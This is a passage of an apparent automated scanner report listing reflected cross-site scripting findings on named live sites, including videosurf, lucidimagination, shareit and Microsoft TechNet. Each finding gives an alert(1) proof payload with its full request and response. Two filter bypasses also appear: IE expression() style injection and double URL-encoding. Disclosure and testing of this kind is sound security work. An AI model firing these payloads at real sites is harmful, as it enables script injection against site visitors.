Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=99; expires=Sun, 11-Dec-2011 18:01:04 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:03 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:03 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bc6009301; expires=Sun, 11-Dec-2011 18:01:04 GMT; path=/; domain=.videosurf.com
Set-Cookie: jack_bauer's_kills=1; path=/; domain=.videosurf.com
Set-Cookie: ATID=deleted; expires=Fri, 11-Dec-2009 18:01:03 GMT; path=/; domain=.videosurf.com
Set-Cookie: ATID=75cffcc820d8ad71007adf86ca9faf65; expires=Sat, 11-Dec-2010 21:01:04 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079?a112e"><script>alert(1)</script>0e0865bbed4=1"/>
...[SNIP]...

2.142. http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079 [vlt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079

Issue detail

The value of the vlt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1fed"><script>alert(1)</script>d56583518f8 was submitted in the vlt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079?vlt=myspacec1fed"><script>alert(1)</script>d56583518f8 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:15:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=91m6rlapmopo0937rlk1c8ht82; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=28; expires=Sun, 11-Dec-2011 18:15:11 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:15:10 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:15:10 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bfaf32e88; expires=Sun, 11-Dec-2011 18:15:11 GMT; path=/; domain=.videosurf.com
Set-Cookie: vlt_code=d059ab68768ae8874c4c125f9bef9ed8; expires=Sat, 11-Dec-2010 19:15:11 GMT; path=/; domain=.videosurf.com
Set-Cookie: jack_bauer's_kills=1; path=/; domain=.videosurf.com
Set-Cookie: ATID=deleted; expires=Fri, 11-Dec-2009 18:15:10 GMT; path=/; domain=.videosurf.com
Set-Cookie: ATID=727ad8728ab9fb072b33e6b151ded3e9; expires=Sat, 11-Dec-2010 21:15:11 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079?vlt=myspacec1fed"><script>alert(1)</script>d56583518f8"/>
...[SNIP]...

2.143. http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/the-invisibles-part-one-seaworld-english-1239815528

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d90bf"><script>alert(1)</script>b08b07e4154 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/the-invisibles-part-one-seaworld-english-1239815528d90bf"><script>alert(1)</script>b08b07e4154 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 11 Dec 2010 18:01:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=f4ourfopm4d69nneempeabt7u4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=34; expires=Sun, 11-Dec-2011 18:01:05 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:04 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:04 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bc6125138; expires=Sun, 11-Dec-2011 18:01:05 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:04 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:04 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528d90bf"><script>alert(1)</script>b08b07e4154"/>
...[SNIP]...

2.144. http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/the-invisibles-part-one-seaworld-english-1239815528

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f62dd"><script>alert(1)</script>f13f92228eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/the-invisibles-part-one-seaworld-english-1239815528?f62dd"><script>alert(1)</script>f13f92228eb=1 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:00:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=9fj3svk3efbh44r9i9v2b7bmp1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=6; expires=Sun, 11-Dec-2011 18:00:57 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:00:56 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:00:56 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bc59e1b5e; expires=Sun, 11-Dec-2011 18:00:57 GMT; path=/; domain=.videosurf.com
Set-Cookie: jack_bauer's_kills=1; path=/; domain=.videosurf.com
Set-Cookie: ATID=deleted; expires=Fri, 11-Dec-2009 18:00:56 GMT; path=/; domain=.videosurf.com
Set-Cookie: ATID=d407a0c384bd35ff330acf8831916137; expires=Sat, 11-Dec-2010 21:00:57 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528?f62dd"><script>alert(1)</script>f13f92228eb=1"/>
...[SNIP]...

2.145. http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528 [vlt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/the-invisibles-part-one-seaworld-english-1239815528

Issue detail

The value of the vlt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dc97"><script>alert(1)</script>4f0431d3213 was submitted in the vlt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/the-invisibles-part-one-seaworld-english-1239815528?vlt=myspace3dc97"><script>alert(1)</script>4f0431d3213 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:15:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=ep1k5dcf3fubc88lomd3ag2b83; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=27; expires=Sun, 11-Dec-2011 18:15:05 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:15:04 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:15:04 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bfa958828; expires=Sun, 11-Dec-2011 18:15:05 GMT; path=/; domain=.videosurf.com
Set-Cookie: vlt_code=ae3282ede261effa45b7e28624df7aee; expires=Sat, 11-Dec-2010 19:15:05 GMT; path=/; domain=.videosurf.com
Set-Cookie: jack_bauer's_kills=1; path=/; domain=.videosurf.com
Set-Cookie: ATID=deleted; expires=Fri, 11-Dec-2009 18:15:04 GMT; path=/; domain=.videosurf.com
Set-Cookie: ATID=47951cdd4ea831f04b99e107848129db; expires=Sat, 11-Dec-2010 21:15:05 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528?vlt=myspace3dc97"><script>alert(1)</script>4f0431d3213"/>
...[SNIP]...

2.146. http://myspace.videosurf.com/videos/' [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /videos/'

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f52e6"><script>alert(1)</script>b84ec9d5f23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videosf52e6"><script>alert(1)</script>b84ec9d5f23/' HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 11 Dec 2010 18:15:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=rf8u5o9boog28n8u4k4ekpb0i7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=90; expires=Sun, 11-Dec-2011 18:15:14 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:15:13 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:15:13 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bfb27bc26; expires=Sun, 11-Dec-2011 18:15:14 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:15:13 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:15:13 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/videosf52e6"><script>alert(1)</script>b84ec9d5f23/'"/>
...[SNIP]...

2.147. http://myspace.videosurf.com/videos/' [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /videos/'

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68f6b"><script>alert(1)</script>318850b51ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videos/'68f6b"><script>alert(1)</script>318850b51ea HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 11 Dec 2010 18:15:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=9gl362l43dogk2oljib78052c0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=13; expires=Sun, 11-Dec-2011 18:15:16 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:15:15 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:15:15 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bfb4832cf; expires=Sun, 11-Dec-2011 18:15:16 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:15:15 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:15:15 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/videos/'68f6b"><script>alert(1)</script>318850b51ea"/>
...[SNIP]...

2.148. http://myspace.videosurf.com/videos/' [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /videos/'

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f540"><script>alert(1)</script>1833c6fd0c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videos/'?2f540"><script>alert(1)</script>1833c6fd0c5=1 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:15:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=itp0ancg0e8qugkdhhatbfiue7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=69; expires=Sun, 11-Dec-2011 18:15:11 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:15:10 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:15:10 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bfaf56f5b; expires=Sun, 11-Dec-2011 18:15:11 GMT; path=/; domain=.videosurf.com
Set-Cookie: ATID=deleted; expires=Fri, 11-Dec-2009 18:15:10 GMT; path=/; domain=.videosurf.com
Set-Cookie: ATID=096de3142e7b1ebcfea7f470df6d7651; expires=Sat, 11-Dec-2010 21:15:11 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/videos/'?2f540"><script>alert(1)</script>1833c6fd0c5=1"/>
...[SNIP]...

2.149. http://network.videosurf.com/beacon/people_search/myspace [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.videosurf.com
Path:   /beacon/people_search/myspace

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91a42"><script>alert(1)</script>e44f5d0946f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon91a42"><script>alert(1)</script>e44f5d0946f/people_search/myspace HTTP/1.1
Host: network.videosurf.com
Proxy-Connection: keep-alive
Referer: http://www.myspace.com/search/people?q='&ac=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 11 Dec 2010 17:21:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=p7nd8357tp5poomlin8hoftkh1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=70; expires=Sun, 11-Dec-2011 17:21:33 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 17:21:32 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 17:21:32 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03b31d48eee; expires=Sun, 11-Dec-2011 17:21:33 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 17:21:32 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 17:21:32 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://network.videosurf.com/beacon91a42"><script>alert(1)</script>e44f5d0946f/people_search/myspace"/>
...[SNIP]...

2.150. http://programs.lucidimagination.com/AW-WP-LS4ES.html [sc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://programs.lucidimagination.com
Path:   /AW-WP-LS4ES.html

Issue detail

The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72933"><script>alert(1)</script>da10c2a3e86 was submitted in the sc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AW-WP-LS4ES.html?sc=WP-LS4ES-GS1U72933"><script>alert(1)</script>da10c2a3e86&_kk=intranet%20search&_kt=ed18f41f-c691-4861-bd74-c8fab6a6d457/x22 HTTP/1.1
Host: programs.lucidimagination.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Set-Cookie: ARPT=LWYXXLSGw2CYLQ; path=/
Date: Sat, 11 Dec 2010 18:15:35 GMT
Server: Apache
Content-Length: 27011
Vary: *,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" l
...[SNIP]...
<input class='mktFormHidden' name="Web_Source_Type__c" id="Web_Source_Type__c" type='hidden' value="WP-LS4ES-GS1U72933"><script>alert(1)</script>da10c2a3e86" />
...[SNIP]...

2.151. http://programs.lucidimagination.com/AW-WP-Starting.html [sc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://programs.lucidimagination.com
Path:   /AW-WP-Starting.html

Issue detail

The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f77b"><script>alert(1)</script>dd903c9789a was submitted in the sc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AW-WP-Starting.html?sc=WP-START-GS1U7f77b"><script>alert(1)</script>dd903c9789a&_kk=intranet%20search%20engine&_kt=21825d11-df4f-47a4-b659-cc8be4a11a7b/x22 HTTP/1.1
Host: programs.lucidimagination.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Set-Cookie: ARPT=LWYXXLSGw1CYLO; path=/
Date: Sat, 11 Dec 2010 18:15:35 GMT
Server: Apache
Content-Length: 27222
Vary: *,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" l
...[SNIP]...
<input class='mktFormHidden' name="Web_Source_Type__c" id="Web_Source_Type__c" type='hidden' value="WP-START-GS1U7f77b"><script>alert(1)</script>dd903c9789a" />
...[SNIP]...

2.152. https://secure.shareit.com/shareit/cart.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.shareit.com
Path:   /shareit/cart.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5729f"style%3d"x%3aexpression(alert(1))"ed5840556f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5729f"style="x:expression(alert(1))"ed5840556f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /shareit/cart.html?productid=300057806&currencies=USD&js=0&5729f"style%3d"x%3aexpression(alert(1))"ed5840556f1=1 HTTP/1.1
Host: secure.shareit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=838993162.20480.0000;

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:17:24 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48235

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>share*it! - A service of Digital River (DEF03)</title>
<style type="
...[SNIP]...
<form action="/shareit/cart.html?currencies=USD&js=0&5729f"style="x:expression(alert(1))"ed5840556f1=1&sessionid=1800044594&random=73ee187dc9960f099e807ed1d9f39120&sessionid=1800044594&random=73ee187dc9960f099e807ed1d9f39120" method="post">
...[SNIP]...

2.153. https://secure.shareit.com/shareit/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.shareit.com
Path:   /shareit/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d392f"style%3d"x%3aexpression(alert(1))"3005d8d59cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d392f"style="x:expression(alert(1))"3005d8d59cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /shareit/product.html?sessionid=1800022192&random=653532a7deb50ad19c4cc7e5d4305662&productid=300057806&d392f"style%3d"x%3aexpression(alert(1))"3005d8d59cb=1 HTTP/1.1
Host: secure.shareit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=838993162.20480.0000;

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:17:12 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41502

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>share*it! - A service of Digital River (DEF03) - Bean Software Searc
...[SNIP]...
<form action="/shareit/product.html?productid=300057806&d392f"style="x:expression(alert(1))"3005d8d59cb=1&sessionid=1800022192&random=653532a7deb50ad19c4cc7e5d4305662&sessionid=1800022192&random=653532a7deb50ad19c4cc7e5d4305662" method="post">
...[SNIP]...

2.154. http://technet.microsoft.com/en-us/library/aa991542.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/aa991542.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75281%2522%253e%253ca%253ebc4fa03f4e7 was submitted in the REST URL parameter 1. This input was echoed as 75281"><a>bc4fa03f4e7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

